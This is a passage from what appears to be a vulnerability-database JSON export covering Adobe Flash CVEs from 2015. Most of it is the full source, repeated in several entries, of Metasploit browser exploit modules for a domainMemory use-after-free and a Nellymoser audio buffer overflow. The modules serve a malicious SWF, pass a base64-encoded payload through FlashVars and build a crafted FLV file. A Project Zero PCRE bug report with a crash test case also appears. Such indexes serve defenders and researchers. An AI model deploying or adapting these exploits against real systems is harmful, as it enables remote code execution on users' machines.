Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36956/"}, {"lastseen": "2016-02-04T06:40:50", "description": "Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution. CVE-2015-3042. Dos exploit for linux platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3042"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37839", "href": "https://www.exploit-db.com/exploits/37839/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nThere\u00e2\u0080\u0099s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.\r\n\r\nThis issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.\r\n\r\nThe issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.\r\n\r\nSimplest testcase that will crash in an ASAN build is the following:\r\n\r\n(?(?<a>)?)\r\n\r\nThis is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.\r\n\r\nRegardless, we emit the following bytecode:\r\n\r\n0000 5d0012 93 BRA [18]\r\n0003 5f000c 95 COND [12]\r\n0006 66 102 BRAZERO \r\n0007 5e00050001 94 CBRA [5, 1]\r\n000c 540005 84 KET [5]\r\n000f 54000c 84 KET [12]\r\n0012 540012 84 KET [18]\r\n0015 00 0 END \r\n\r\nWhen this is executed, we reach the following code:\r\n\r\n/* The condition is an assertion. Call match() to evaluate it - setting\r\nthe final argument match_condassert causes it to stop at the end of an\r\nassertion. */\r\n\r\nelse\r\n {\r\n RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,\r\n match_condassert, RM3);\r\n if (rrc == MATCH_MATCH)\r\n {\r\n condition = TRUE;\r\n ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n while (*ecode == OP_ALT) ecode += GET(ecode, 1); <---- ecode is out of bounds at this point.\r\n\r\nIf we look at the execution trace for this expression, we can see where this code goes wrong:\r\n\r\nexec 0x600e0000dfe4 93 [0x60040000dfd0 41]\r\nexec 0x600e0000dfe7 95 [0x60040000dfd0 41]\r\nexec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match\r\nexec 0x600e0000dfeb 94 [0x60040000dfd0 41]\r\nexec 0x600e0000dff0 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff3 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff6 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff9 0 [0x60040000dfd0 41] <--- recursive match returns\r\nbefore 0x600e0000dfe7 24067 <--- ecode == 0x...dfe7\r\nafter 0x600e00013dea\r\n\r\nIf we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.\r\n\r\necode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n\r\nIn this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.\r\n\r\nSee attached for a crash PoC for the latest Chrome/Flash on x64 linux.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37839/"}, {"lastseen": "2016-02-04T06:03:05", "description": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow. CVE-2015-3043. Remote exploits for multiple platform", "published": "2015-07-08T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043"], "modified": "2015-07-08T00:00:00", "id": "EDB-ID:37536", "href": "https://www.exploit-db.com/exploits/37536/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\r\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\r\n has been tested successfully on:\r\n\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\r\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\r\n\r\n Note that this exploit is effective against both CVE-2015-3113 and the\r\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\r\n to the same root cause as CVE-2015-3043.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3043'],\r\n ['CVE', '2015-3113'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\r\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 23 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n @flv = create_flv\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n if request.uri =~ /\\.flv$/\r\n print_status('Sending FLV...')\r\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\n def create_flv\r\n header = ''\r\n header << 'FLV' # signature\r\n header << [1].pack('C') # version\r\n header << [4].pack('C') # Flags: TypeFlagsAudio\r\n header << [9].pack('N') # DataOffset\r\n\r\n data = ''\r\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\r\n data << \"\\xee\" * 0x440 # SoundData\r\n\r\n tag1 = ''\r\n tag1 << [8].pack('C') # TagType (audio)\r\n tag1 << \"\\x00\\x04\\x41\" # DataSize\r\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\r\n tag1 << [0].pack('C') # TimeStampExtended\r\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\r\n tag1 << data\r\n\r\n body = ''\r\n body << [0].pack('N') # PreviousTagSize\r\n body << tag1\r\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\r\n\r\n flv = ''\r\n flv << header\r\n flv << body\r\n\r\n flv\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37536/"}], "packetstorm": [{"lastseen": "2016-12-05T22:23:18", "description": "", "published": "2015-05-07T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player domainMemory ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2015-05-07T00:00:00", "id": "PACKETSTORM:131825", "href": "https://packetstormsecurity.com/files/131825/Adobe-Flash-Player-domainMemory-ByteArray-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free', \n'Description' => %q{ \nThis module exploits a use-after-free vulnerability in Adobe Flash Player. The \nvulnerability occurs when the ByteArray assigned to the current ApplicationDomain \nis freed from an ActionScript worker, when forcing a reallocation by copying more \ncontents than the original capacity, but Flash forgets to update the domainMemory \npointer, leading to a use-after-free situation when the main worker references the \ndomainMemory again. This module has been tested successfully on Windows 7 SP1 \n(32-bit), IE 8 and IE11 with Flash 17.0.0.134. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'bilou', # Vulnerability discovery according to Flash Advisory \n'Unknown', # Exploit in the wild \n'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one) \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-0359'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'], \n['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'], \n['URL', 'https://git.hacklab.kr/snippets/13'], \n['URL', 'http://pastebin.com/Wj3NViUu'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => OperatingSystems::Match::WINDOWS_7, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') }, \n:arch => ARCH_X86 \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 14 2014', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \npsh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) \nb64_payload = Rex::Text.encode_base64(psh_payload) \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131825/adobe_flash_domain_memory_uaf.rb.txt"}, {"lastseen": "2016-12-05T22:14:21", "description": "", "published": "2015-07-03T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3113", "CVE-2015-3043"], "modified": "2015-07-03T00:00:00", "id": "PACKETSTORM:132525", "href": "https://packetstormsecurity.com/files/132525/Adobe-Flash-Player-Nellymoser-Audio-Decoding-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow on Adobe Flash Player when handling nellymoser \nencoded audio inside a FLV video, as exploited in the wild on June 2015. This module \nhas been tested successfully on: \n \nWindows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, \nWindows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, \nWindows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, \nLinux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and \nUbuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. \n \nNote that this exploit is effective against both CVE-2015-3113 and the \nearlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression \nto the same root cause as CVE-2015-3043. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Exploit in the wild \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-3043'], \n['CVE', '2015-3113'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], \n['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], \n['URL', 'http://bobao.360.cn/learning/detail/357.html'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \nreturn true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') \nreturn true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 23 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n@flv = create_flv \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nif request.uri =~ /\\.flv$/ \nprint_status('Sending FLV...') \nsend_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \ndef create_flv \nheader = '' \nheader << 'FLV' # signature \nheader << [1].pack('C') # version \nheader << [4].pack('C') # Flags: TypeFlagsAudio \nheader << [9].pack('N') # DataOffset \n \ndata = '' \ndata << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 \ndata << \"\\xee\" * 0x440 # SoundData \n \ntag1 = '' \ntag1 << [8].pack('C') # TagType (audio) \ntag1 << \"\\x00\\x04\\x41\" # DataSize \ntag1 << \"\\x00\\x00\\x1a\" # TimeStamp \ntag1 << [0].pack('C') # TimeStampExtended \ntag1 << \"\\x00\\x00\\x00\" # StreamID, always 0 \ntag1 << data \n \nbody = '' \nbody << [0].pack('N') # PreviousTagSize \nbody << tag1 \nbody << [0xeeeeeeee].pack('N') # PreviousTagSize \n \nflv = '' \nflv << header \nflv << body \n \nflv \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132525/adobe_flash_nellymoser_bof.rb.txt"}], "metasploit": [{"lastseen": "2020-10-08T00:03:47", "description": "This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\n", "published": "2015-05-07T22:00:00", "type": "metasploit", "title": "Adobe Flash Player domainMemory ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_DOMAIN_MEMORY_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',\n 'Description' => %q{\n This module exploits a use-after-free vulnerability in Adobe Flash Player. The\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\n is freed from an ActionScript worker, when forcing a reallocation by copying more\n contents than the original capacity, but Flash forgets to update the domainMemory\n pointer, leading to a use-after-free situation when the main worker references the\n domainMemory again. This module has been tested successfully on Windows 7 SP1\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bilou', # Vulnerability discovery according to Flash Advisory\n 'Unknown', # Exploit in the wild\n 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-0359'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],\n ['URL', 'https://git.hacklab.kr/snippets/13'],\n ['URL', 'http://pastebin.com/Wj3NViUu']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },\n :flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },\n :arch => ARCH_X86\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-04-14',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n platform_id = 'win'\n os_name = target_info[:os_name]\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb"}, {"lastseen": "2020-10-07T22:15:42", "description": "This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same 